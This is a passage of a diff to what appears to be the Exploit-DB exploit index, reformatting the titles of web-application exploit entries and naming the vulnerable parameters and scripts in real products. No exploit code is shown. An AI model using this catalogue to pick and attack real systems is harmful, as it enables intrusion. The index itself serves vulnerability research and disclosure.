SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0 38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 38799,platforms/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 -38800,platforms/php/webapps/38800.txt,"FreeSMS - pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 -38801,platforms/php/webapps/38801.txt,"FreeSMS - pages/crc_handler.php Multiple Parameter Cross-Site Scripting",2013-09-27,"Sarahma Security",php,webapps,0 +38800,platforms/php/webapps/38800.txt,"FreeSMS - 'pages/crc_handler.php?scheduleid' SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 +38801,platforms/php/webapps/38801.txt,"FreeSMS - 'pages/crc_handler.php' Multiple Cross-Site Scripting Vulnerabilities",2013-09-27,"Sarahma Security",php,webapps,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 +38808,platforms/php/webapps/38808.txt,"WordPress Plugin WP-Realty - 'listing_id' SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 -38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 +38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 38819,platforms/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0 38820,platforms/php/webapps/38820.php,"WordPress Theme This Way - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 @@ -36897,7 +36898,7 @@ id,file,description,date,author,platform,type,port 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 -38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion",2013-11-18,Esac,php,webapps,0 +38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Local File Inclusion",2013-11-18,Esac,php,webapps,0 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0 38844,platforms/php/webapps/38844.html,"WordPress Plugin Blue Wrench Video Widget - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 @@ -36907,35 +36908,35 @@ id,file,description,date,author,platform,type,port 38855,platforms/php/webapps/38855.txt,"WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38856,platforms/php/webapps/38856.txt,"WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38861,platforms/php/webapps/38861.txt,"WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 -38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 -38863,platforms/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php query' Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 -38864,platforms/php/webapps/38864.php,"NeoBill - '/install/include/solidstate.php' Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 -38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 +38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' SQL Injection",2013-12-06,xin.wang,php,webapps,0 +38863,platforms/php/webapps/38863.php,"NeoBill - '/modules/nullregistrar/PHPwhois/example.php?query' Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 +38864,platforms/php/webapps/38864.php,"NeoBill - '/install/include/solidstate.php' Multiple SQL Injections",2013-12-06,KedAns-Dz,php,webapps,0 +38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38870,platforms/php/webapps/38870.txt,"WordPress Plugin Easy Career Openings - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 +38870,platforms/php/webapps/38870.txt,"WordPress Plugin Easy Career Openings - 'jobid' SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 38872,platforms/php/webapps/38872.php,"WordPress Plugin PhotoSmash Galleries - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 -38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 -38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 +38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 +38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 38875,platforms/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps,0 -38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp pa' Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 +38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp?pa' SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)",2013-12-16,R3d-D3V!L,php,webapps,0 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections",2013-12-14,R3d-D3V!L,asp,webapps,0 -38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 +38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo - admin.php Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 -38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 +38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'apps/news-events/newdetail.asp?id' SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 -38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 +38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0 -38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 -38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 -38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 +38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80 38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0 @@ -36945,7 +36946,7 @@ id,file,description,date,author,platform,type,port 38902,platforms/php/webapps/38902.txt,"WordPress Plugin Polls Widget 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80 38907,platforms/php/webapps/38907.txt,"Osclass - Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0 -38908,platforms/php/webapps/38908.txt,"Leed - 'id' Parameter SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps,0 +38908,platforms/php/webapps/38908.txt,"Leed - 'id' SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps,0 38913,platforms/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38914,platforms/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 @@ -36958,30 +36959,30 @@ id,file,description,date,author,platform,type,port 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform < 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 -38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 +38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38938,platforms/php/webapps/38938.txt,"xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 38943,platforms/php/webapps/38943.txt,"Joomla! Component com_aclsfgpl - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 -38944,platforms/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38945,platforms/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38946,platforms/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38947,platforms/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38948,platforms/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38949,platforms/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38950,platforms/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38951,platforms/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38952,platforms/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38953,platforms/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38954,platforms/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38955,platforms/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38944,platforms/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38945,platforms/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38946,platforms/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38947,platforms/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38948,platforms/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38949,platforms/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38950,platforms/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38951,platforms/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38952,platforms/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38953,platforms/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38954,platforms/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38955,platforms/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38956,platforms/php/webapps/38956.txt,"Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38957,platforms/php/webapps/38957.html,"Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38958,platforms/php/webapps/38958.html,"Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38965,platforms/php/webapps/38965.txt,"ECommerceMajor - productdtl.php (prodid) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 +38965,platforms/php/webapps/38965.txt,"ECommerceMajor - 'productdtl.php?prodid' SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 38966,platforms/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 -39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 +39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39098,platforms/php/webapps/39098.txt,"Joomla! Component com_wire_immogest - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injections",2014-01-13,"Rohan Stelling",php,webapps,0 38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Directory Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 @@ -36990,43 +36991,43 @@ id,file,description,date,author,platform,type,port 38977,platforms/php/webapps/38977.py,"Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps,0 38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 -38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php Id' Parameter SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 +38985,platforms/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php?Id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38987,platforms/php/webapps/38987.html,"Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 38988,platforms/php/webapps/38988.txt,"Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,0 -38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 +38989,platforms/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusions",2015-12-15,bd0rk,php,webapps,80 38991,platforms/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,php,webapps,80 -39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - '/products.php' Multiple Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 -39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - '/news.php id' Parameter SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 +39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - 'products.php' Multiple SQL Injections",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 +39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - 'news.php?id' SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps,0 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 39016,platforms/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 -39028,platforms/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 -39029,platforms/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39030,platforms/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php Username' Parameter SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39028,platforms/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 +39029,platforms/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39030,platforms/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39031,platforms/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,0 39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 39099,platforms/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,php,webapps,0 39038,platforms/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps,0 39058,platforms/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",php,webapps,0 39059,platforms/php/webapps/39059.txt,"WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 -39060,platforms/php/webapps/39060.txt,"XOS Shop - 'goto' Parameter SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 +39060,platforms/php/webapps/39060.txt,"XOS Shop - 'goto' SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto - SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 39063,platforms/php/webapps/39063.txt,"WordPress Plugin WP E-Commerce - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 -39066,platforms/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 +39066,platforms/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0 39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80 39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0 39079,platforms/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39080,platforms/php/webapps/39080.txt,"Atmail WebMail - searchResultsTab5 filter Parameter Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39081,platforms/php/webapps/39081.txt,"Atmail WebMail - INBOX.Trash mailId Parameter Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 -39083,platforms/php/webapps/39083.txt,"Bigware Shop 2.3.01 - Multiple Local File Inclusion",2015-12-23,bd0rk,php,webapps,80 +39083,platforms/php/webapps/39083.txt,"Bigware Shop 2.3.01 - Multiple Local File Inclusions",2015-12-23,bd0rk,php,webapps,80 39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 @@ -37040,17 +37041,17 @@ id,file,description,date,author,platform,type,port 39106,platforms/asp/webapps/39106.txt,"eshtery CMS - 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 -39109,platforms/php/webapps/39109.txt,"WordPress Plugin Relevanssi - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 -39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 +39109,platforms/php/webapps/39109.txt,"WordPress Plugin Relevanssi - 'category_name' SQL Injection",2014-03-04,anonymous,php,webapps,0 +39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' SQL Injection",2014-03-05,Slotleet,php,webapps,0 39111,platforms/php/webapps/39111.php,"WordPress Plugin Premium Gallery Manager - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 -39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injections",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 +39113,platforms/php/webapps/39113.txt,"Professional Designer 